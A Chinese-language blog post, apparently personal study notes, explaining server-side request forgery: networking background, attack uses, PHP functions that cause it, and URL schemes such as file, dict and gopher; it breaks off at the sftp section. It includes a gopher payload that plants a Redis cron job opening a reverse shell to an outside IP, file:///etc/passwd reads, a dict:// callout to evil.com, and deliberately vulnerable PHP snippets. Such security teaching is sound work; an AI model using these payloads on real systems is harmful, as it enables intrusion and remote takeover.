<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>ssrf漏洞总结 | hybcx's blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"code.copy","copyFinish":"code.copyFinish","expand":"code.expand"}}</script><link rel="stylesheet" href="//unpkg.com/@waline/client@v2/dist/waline.css"><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/friends/"><span class="navItemTitle">Friends</span></a></li><li class="navItem"><a class="navBlock" href="/about"><span class="navItemTitle">About</span></a></li></ol></nav></header><div id="shadow-header"></div><article><div id="post-bg"><div id="post-title"><h1>ssrf漏洞总结</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-07-26T08:37:36.107Z" id="date"> 2023-07-26</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-07-27T05:30:05.901Z" id="updated"> 2023-07-27</time></div></span><br><span>Word Count: <div class="control">8.8k</div></span><br><span>Read Time: <div class="control">37 min</div></span></div></div><hr><div id="post-content"><h1>ssrf漏洞总结</h1>
<h2 id="一、SSRF是什么？"><a href="#一、SSRF是什么？" class="headerlink" title="一、SSRF是什么？"></a>一、SSRF是什么？</h2>
<p>SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。</p>
<p>一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）</p>
<h2 id="二、SSRF漏洞原理"><a href="#二、SSRF漏洞原理" class="headerlink" title="二、SSRF漏洞原理"></a>二、SSRF漏洞原理</h2>
<p>SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。</p>
<p class='item-img' data-src='image-20230619153546339.png'><img src="image-20230619153546339.png" alt="image-20230619153546339"></p>
<p>比如,黑客操作服务端从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据<br><br>数据流:攻击者-----&gt;服务器----&gt;目标地址<br><br>即：利用一个可以发起网络请求的服务（存在缺陷的web应用），当作跳板来攻击其他服务器。<br><br>我的理解是攻击者利用一个存在缺陷的web应用（服务器），而该服务器可以访问受害者的服务器，那么攻击者对web应用发起一种请求（要获取受害者服务器内网资源的请求），该web应用由于对该请求没有做出严格的过滤，被认为该请求是安全的，返回受害者服务器的内部资源和数据<br></code></pre></td></tr></table></figure>
<h4 id="什么是内网访问"><a href="#什么是内网访问" class="headerlink" title="什么是内网访问"></a>什么是内网访问</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">csdn上看了一篇大佬的文章，感觉挺通俗易懂。我就简单复述一下，加深一下印象。<br><br>首先需要了解一下公有ip和私有ip<br><br>公有ip:公有ip是全球唯一的，需要注册才能使用。而且是可以直接上网的。<br><br>私有ip：私有ip不需要注册，因此，他不能直接上网。我们平时上网一般都是通过网络运营商（移动，联通，电信）。原理就是这些个运营商呀，他们是购买了公有ip的。然后他们分配给我们这些用户，我们使用的就是私有ip，或者叫局域网。这样的话，就会导致你和你周围的邻居们分出来的私有ip可能是一样的。 这样的好处是我们大家都可以方便的上网，当然也有不利之处，那就是两家相同私有ip同时访问百度页面，这个百度的服务器怎么分辨这两家分别是谁呢。这个就要用到另外一个东西：端口映射。<br></code></pre></td></tr></table></figure>
<h4 id="什么是端口映射"><a href="#什么是端口映射" class="headerlink" title="什么是端口映射"></a>什么是端口映射</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">端口映射是NAT的一种，他将外网IP地址的一个端口映射到内网中一台机器，提供相应的服务。当用户访问该IP的这个端口时，服务器自动将请求映射到对应局域网的内部机器上，现在市场是的家庭路由器都具备NAT功能，也可以实现端口映射。下图是小米路由器的端口映射设置图：<br></code></pre></td></tr></table></figure>
<p>对于这个概念，我个人的理解就是外网的ip地址的一个端口与内网的一个端口(或许是直接对应到内网的某个服务器?下面的图更好理解)实现对应。</p>
<p>我们平时经过路由器，通过宽带，最终去到运营商那边，数据是从运营商出去，最终数据是回到运营商那边，运营商再把数据发送到用户的电脑。<br>
路由器，至少有两个端口：WAN 口和 LAN 口。<br>
WAN：接外部 IP 地址用，通常指的是出口，转发来自内部 LAN 接口的 IP 数据包，这个口的 IP 是唯一的。</p>
<p>LAN：接内部 IP 地址用，LAN 内部是交换机。</p>
<p class='item-img' data-src='image-20230410124515378.png'><img src="image-20230410124515378.png" alt="image-20230410124515378"></p>
<p>A 电脑的 IP 是局域网 IP（192.168.31.11），这个 IP（192.168.31.11）是从路由器的 lan口分配的。<br>
当我们上百度的时候，经过路由器的 wan口，进行相应的IP、端口转化：192.168.31.11:80 -&gt; 10.221.0.24:8080,所以，从 wan口出去的地址为：10.221.0.24:8080。</p>
<p class='item-img' data-src='image-20230410124612917.png'><img src="image-20230410124612917.png" alt="image-20230410124612917"></p>
<p>最后，经过运营商，运营商那边会做相应的端口映射（而且是动态端口映射），子网 IP（10.221.0.24:8080）转化为公网IP（128.0.0.1:8888），通过这个公网 IP 去访问百度服务器</p>
<p class='item-img' data-src='image-20230410124621806.png'><img src="image-20230410124621806.png" alt="image-20230410124621806"></p>
<p>这位博主贴的图也是非常的形象，上面也有详细的介绍。简单来说，就是左下角和右下角两个ip地址对应的都是用户的私有ip，然后通过LAN将子网进行转换。然后再通过WAN口将子网转为公网。</p>
<h2 id="三、漏洞挖掘"><a href="#三、漏洞挖掘" class="headerlink" title="三、漏洞挖掘"></a>三、漏洞挖掘</h2>
<h3 id="危害与利用："><a href="#危害与利用：" class="headerlink" title="危害与利用："></a>危害与利用：</h3>
<pre><code>1、端口扫描

对外网、服务器所在内网、本地进行端口扫描

eg：http://example.com/ssrf.php?url=http://192.168.139.1:80/

通过应用响应时间、返回的错误信息，未开放端口会显示空白或者报错，开放端口会显示服务的banner信息
</code></pre>
<p>​<br>
​    2、攻击内网、本地漏洞服务<br>
​<br>
​    攻击运行在内网或本地的应用程序（溢出、弱口令等）<br>
​<br>
​    利用Gopher协议拓展攻击面</p>
<p>​<br>
​    3、内网Web应用指纹识别、攻击漏洞应用<br>
​<br>
​    访问默认文件，对内网web应用进行指纹识别（框架，平台，模块以及CMS等 ）<br>
​<br>
​    攻击内外网的web应用，主要是使用get参数就可以实现的攻击（如struts2，sqli等）;<br>
​<br>
​    第一步，应用指纹识别----&gt;第二步，寻找漏洞-----&gt;第三步，漏洞利用</p>
<p>​<br>
​    4、文件读取<br>
​<br>
​    读取本地文件，利用file协议读取本地文件，提交参数等<br>
​<br>
​    <a href="http://example.com/ssrf.php?url=file:///etc/passwd">http://example.com/ssrf.php?url=file:///etc/passwd</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1、可以对服务器所在的内网环境进行端口扫描、资源访问<br><br>2、利用漏洞和Payload进一步攻击运行其他的应用程序;<br><br>3、对内网web应用进行指纹识别，通过访问应用存在的默认文件实现<br><br>4、GET型漏洞利用，GET参数就可以实现的攻击，比如struts2漏洞利用等<br><br>5、POST型漏洞利用，可利用gopher协议进行参数构造;<br><br>6、利用Redis未授权访问getshell、Weblogic默认SSRF漏洞页面<br><br>7、如果ssrf漏洞存在于云服务器<br>    攻击元数据服务<br>    攻击存储桶<br>    攻击Kubelet API<br>    越权攻击云平台内其他组件或服务<br></code></pre></td></tr></table></figure>
<h3 id="漏洞场景："><a href="#漏洞场景：" class="headerlink" title="漏洞场景："></a>漏洞场景：</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1、通过URL地址进行网页分享;<br>http://share.xxx.com/index.php?url=http://www.xxx.com<br><br>2、转码服务，通过URL地址把原地址的网页转换格式<br><br>3、图片加载与下载，一般是通过url参数进行图片获取<br>http://image.xxx.com/image.php?image=http://www.xxx.com<br><br>4、未公开的api实现以及其他调用url的功能;<br><br>5、设备后台管理进行存活测试;<br><br>6、远程资源调用功能;<br><br>7、数据库内置功能;<br><br>8、编辑器进行远程图片抓取，如: ueditor;<br><br>9、打包附件或者内容编辑并导出时<br><br>10、PDF生成或导出<br><br>11、从URL关键字中寻找<br>利用google 语法加上这些关键字去寻找SSRF漏洞<br>	share<br>    wap<br>    url<br>    link<br>    src<br>    source<br>    target<br>    u<br>    display<br>    sourceURl<br>    imageURL<br>    domain<br></code></pre></td></tr></table></figure>
<p>简单来说：所有目标服务器会从自身发起请求的功能点，且我们可以控制地址的参数，都可能造成SSRF漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">从远程服务器请求资源（Upload from URL，Import &amp; Export RSS Feed）<br><br>数据库内置功能（Oracle、MongoDB、MSSQL、Postgres、CouchDB）<br><br>Webmail 收取其他邮箱邮件（POP3、IMAP、SMTP）<br><br>文件处理、编码处理、属性信息处理（ffmpeg、ImageMagic、DOCX、PDF、XML）<br></code></pre></td></tr></table></figure>
<h4 id="利用技巧"><a href="#利用技巧" class="headerlink" title="利用技巧"></a>利用技巧</h4>
<p>利用条件：被攻击的服务等没有开启加密传输与鉴权。</p>
<pre><code>端口扫描（扫描内网）
攻击内网存在漏洞的服务
攻击Web应用进行指纹识别及其中的漏洞
如果PHP安装了expect扩展，可以通过expect协议执行系统命令
dos攻击
file 协议暴力枚举敏感文件
</code></pre>
<p>Redis未授权漏洞的6种利用方法</p>
<pre><code>保存文件到www目录，形成webshell
创建authorized_keys文件，利用ssh 私钥登录服务器
写计划任务(/var/spool/cron/ &amp; /etc/cron.d/)
slave of 8.8.8.8 主从模式利用
写入到/etc/profile.d/ 用户环境变量修改
开启AOF持久化纯文本记录 appendfilename
</code></pre>
<p>存在<code>SSRF</code>漏洞的站点主要利用四个协议，分别是<code>http、file、gopher、dict</code>协议</p>
<p><code>file</code>协议进行本地文件的读取<br>
<code>http</code>协议进行内网的ip扫描、端口探测<br>
探测到<code>6379</code>端口开放，可以利用<code>http、gopher、dict</code>这几个协议来打开放<code>6379</code>端口的<code>redis</code>服务。</p>
<p class='item-img' data-src='image-20230619190118468.png'><img src="image-20230619190118468.png" alt="image-20230619190118468"></p>
<p>最常见的是通过<code>file、dict、gopher</code>这三个协议来进行渗透。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">curl -vvv &#x27;dict://127.0.0.1:6379/info&#x27; <br><br>curl -vvv &#x27;file:///etc/passwd&#x27; <br># * 注意: 链接使用单引号，避免$变量问题 <br><br>curl -vvv &#x27;gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i &gt;&amp; /dev/tcp/103.21.140.84/6789 0&gt;&amp;1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a&#x27;<br></code></pre></td></tr></table></figure>
<h2 id="四、产生SSRF漏洞的函数"><a href="#四、产生SSRF漏洞的函数" class="headerlink" title="四、产生SSRF漏洞的函数"></a>四、产生SSRF漏洞的函数</h2>
<p>SSRF攻击可能存在任何语言编写的应用，接下来将举例php中可能存在SSRF漏洞的函数。</p>
<p><strong>1、file_get_contents:（只能使用GET方式获取数据）</strong></p>
<p>下面的代码使用file_get_contents函数从用户指定的url获取图片。然后把它用一个随机文件名保存在硬盘上，并展示给用户。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">定义：把整个文件读入一个字符串中<br>语法：file_get_contents(path,include_path,context,start,max_length)<br><br>参数	描述<br>path	必需。要读取的文件<br>	<br>include_path	可选。要在 include_path 中搜寻文件，将该参数设为 &quot;1&quot;<br><br>context	可选。规定文件句柄的环境，context 是一套可以修改流的行为的选项。若使用 null，则忽略。<br><br>start	可选。文件中开始读取的位置 (适用于PHP 5.1以后)<br><br>max_length	可选。读取的字节数 (适用于PHP 5.1以后)<br></code></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;url&#x27;</span>])) <br>&#123; <br><span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;url&#x27;</span>]); <br><span class="hljs-variable">$filename</span> =<span class="hljs-string">&#x27;./images/&#x27;</span>.<span class="hljs-title function_ invoke__">rand</span>().<span class="hljs-string">&#x27;;img1.jpg&#x27;</span>; <br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$filename</span>, <span class="hljs-variable">$content</span>); <br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;url&#x27;</span>]; <br><span class="hljs-variable">$img</span> = <span class="hljs-string">&quot;&lt;img src=\&quot;&quot;</span>.<span class="hljs-variable">$filename</span>.<span class="hljs-string">&quot;\&quot;/&gt;&quot;</span>; <br>&#125; <br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$img</span>; <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><strong>2、fsockopen():</strong></p>
<p>以下代码使用fsockopen函数实现获取用户指定url的数据（文件或者html）。这个函数会使用socket跟服务器建立tcp连接，传输原始数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">定义：打开一个网络连接或者一个Unix套接字连接<br>参数	描述<br>hostname	安装了OpenSSL，添加访问协议ssl://或者是tls://，从而可以使用基于TCP/IP协议的SSL或者TLS的客户端连接到远程主机<br><br>port	端口号。如果对该参数传一个-1，则表示不使用端口，例如unix://<br><br>errno	如果errno的返回值为0，而且这个函数的返回值为false，那么这表明该错误发生在套接字连接（connect()）调用之前，导致连接失败的原因最大的可能是初始化套接字的时候发生了错误<br><br>errstr	错误信息将以字符串的信息返回。<br><br>timeout	设置连接的时限，单位为秒。<br></code></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">GetFile</span>(<span class="hljs-params"><span class="hljs-variable">$host</span>,<span class="hljs-variable">$port</span>,<span class="hljs-variable">$link</span></span>) </span><br><span class="hljs-function"></span>&#123; <br>    <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fsockopen</span>(<span class="hljs-variable">$host</span>, <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$port</span>), <span class="hljs-variable">$errno</span>, <span class="hljs-variable">$errstr</span>, <span class="hljs-number">30</span>); <br>    <span class="hljs-keyword">if</span> (!<span class="hljs-variable">$fp</span>) &#123; <br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;<span class="hljs-subst">$errstr</span> (error number <span class="hljs-subst">$errno</span>) \n&quot;</span>; <br>    &#125;<span class="hljs-keyword">else</span> &#123; <br>        <span class="hljs-variable">$out</span> = <span class="hljs-string">&quot;GET <span class="hljs-subst">$link</span> HTTP/1.1\r\n&quot;</span>; <br>        <span class="hljs-variable">$out</span> .= <span class="hljs-string">&quot;Host: <span class="hljs-subst">$host</span>\r\n&quot;</span>; <br>        <span class="hljs-variable">$out</span> .= <span class="hljs-string">&quot;Connection: Close\r\n\r\n&quot;</span>; <br>        <span class="hljs-variable">$out</span> .= <span class="hljs-string">&quot;\r\n&quot;</span>; <br>        <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-variable">$out</span>); <br>        <span class="hljs-variable">$contents</span>=<span class="hljs-string">&#x27;&#x27;</span>; <br>        <span class="hljs-keyword">while</span> (!<span class="hljs-title function_ invoke__">feof</span>(<span class="hljs-variable">$fp</span>)) &#123; <br>            <span class="hljs-variable">$contents</span>.= <span class="hljs-title function_ invoke__">fgets</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-number">1024</span>); <br>        &#125; <br>        <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>); <br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$contents</span>; <br>    &#125; <br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><strong>3、curl_exec():支持多种协议</strong></p>
<p>cURL这是另一个非常常见的实现，它通过 PHP获取数据。文件/数据被下载并存储在“curled”文件夹下的磁盘中，并附加了一个随机数和“.txt”文件扩展名。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">定义：执行一个cURL会话<br><br>参数：ch  由 curl_init() 返回的 cURL 句柄。<br><br>用法：抓取URL并把它传递给浏览器 curl_exec($ch)<br></code></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;url&#x27;</span>]))<br>&#123;<br><span class="hljs-variable">$link</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;url&#x27;</span>];<br><span class="hljs-variable">$curlobj</span> = <span class="hljs-title function_ invoke__">curl_init</span>();<br><span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$curlobj</span>, CURLOPT_POST, <span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$curlobj</span>,CURLOPT_URL,<span class="hljs-variable">$link</span>);<br><span class="hljs-title function_ invoke__">curl_setopt</span>(<span class="hljs-variable">$curlobj</span>, CURLOPT_RETURNTRANSFER, <span class="hljs-number">1</span>);<br><span class="hljs-variable">$result</span>=<span class="hljs-title function_ invoke__">curl_exec</span>(<span class="hljs-variable">$curlobj</span>);<br><span class="hljs-title function_ invoke__">curl_close</span>(<span class="hljs-variable">$curlobj</span>);<br> <br><span class="hljs-variable">$filename</span> = <span class="hljs-string">&#x27;./curled/&#x27;</span>.<span class="hljs-title function_ invoke__">rand</span>().<span class="hljs-string">&#x27;.txt&#x27;</span>;<br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$filename</span>, <span class="hljs-variable">$result</span>); <br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$result</span>;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>注意事项</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">一般情况下PHP不会开启fopen的gopher wrapper<br>file_get_contents的gopher协议不能URL编码<br>file_get_contents关于Gopher的302跳转会出现bug，导致利用失败<br>curl/libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用<br>curl_exec() 默认不跟踪跳转，<br>file_get_contents()支持php://input协议<br></code></pre></td></tr></table></figure>
<h2 id="五、SSRF中URL的伪协议"><a href="#五、SSRF中URL的伪协议" class="headerlink" title="五、SSRF中URL的伪协议"></a>五、SSRF中URL的伪协议</h2>
<p><code>redis</code>服务是在<code>6379</code>端口开启的</p>
<p>浅浅了解一下redis服务</p>
<p class='item-img' data-src='image-20230619185015979.png'><img src="image-20230619185015979.png" alt="image-20230619185015979"></p>
<p>浅浅了解一下curl命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">curl 是常用的命令行工具，用来请求 Web 服务器。它的名字就是客户端（client）的 URL 工具的意思<br></code></pre></td></tr></table></figure>
<p>不带有任何参数时，curl 就是发出 GET 请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">$ curl https://www.example.com<br></code></pre></td></tr></table></figure>
<p>上面命令向<code>www.example.com</code>发出 GET 请求，服务器返回的内容会在命令行输出</p>
<p><code>-v</code>参数输出通信的整个过程，用于调试。我们便可以利用<code>-v</code>参数进行读取文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">使用file协议curl -v file:///etc/passwd<br>使用ftp协议 curl -v &quot;ftp://127.0.0.1:端口/info&quot;<br>使用dict协议 curl -v &quot;dict://127.0.0.1:端口/info&quot;<br>使用gopher协议 curl -v &quot;gopher://127.0.0.1:端口/_info&quot;<br></code></pre></td></tr></table></figure>
<p>其他参数可以参考<a target="_blank" rel="noopener" href="http://www.ruanyifeng.com/blog/2019/09/curl-reference.html">curl</a></p>
<p><strong>常见内网IP段</strong></p>
<p>局域网地址范围分三类，以下IP段为内网IP段：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">C类：192.168.0.0 - 192.168.255.255 <br><br>B类：172.16.0.0 - 172.31.255.255 <br><br>A类：10.0.0.0 - 10.255.255.255<br></code></pre></td></tr></table></figure>
<p><strong>当我们发现SSRF漏洞后，首先要做的事情就是测试所有可用的URL伪协议</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">file:/// 从文件系统中获取文件内容，如，file:///etc/passwd<br>dict:// 字典服务器协议，访问字典资源，如，dict:///ip:6739/info：<br>sftp:// SSH文件传输协议或安全文件传输协议<br>ldap:// 轻量级目录访问协议<br>tftp:// 简单文件传输协议<br>gopher:// 分布式文档传递服务，可使用gopherus生成payload<br></code></pre></td></tr></table></figure>
<h3 id="5-1-file"><a href="#5-1-file" class="headerlink" title="5-1-file"></a>5.1 file</h3>
<p>这种URL Schema可以尝试从文件系统中获取文件：</p>
<pre><code>http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini
</code></pre>
<p>如果该服务器阻止对外部站点发送HTTP请求，或启用了白名单防护机制，只需使用如下所示的URL Schema就可以绕过这些限制：</p>
<h3 id="5-2-dict"><a href="#5-2-dict" class="headerlink" title="5-2-dict"></a>5.2 dict</h3>
<p>这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表。</p>
<p><code>DICT</code>协议,一个字典服务器协议,<code>A Dictionary Server Protocol</code>，允许客户端在使用过程中访问更多字典并且该协议约定服务器端侦听端口号:<code>2628</code>。</p>
<pre><code>http://example.com/ssrf.php?dict://evil.com:1337/
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*]
accepted (family 2, sport 31126)CLIENT libcurl 7.40.0
</code></pre>
<h3 id="5-3-sftp"><a href="#5-3-sftp" class="headerlink" title="5-3-sftp"></a>5.3 sftp</h3>
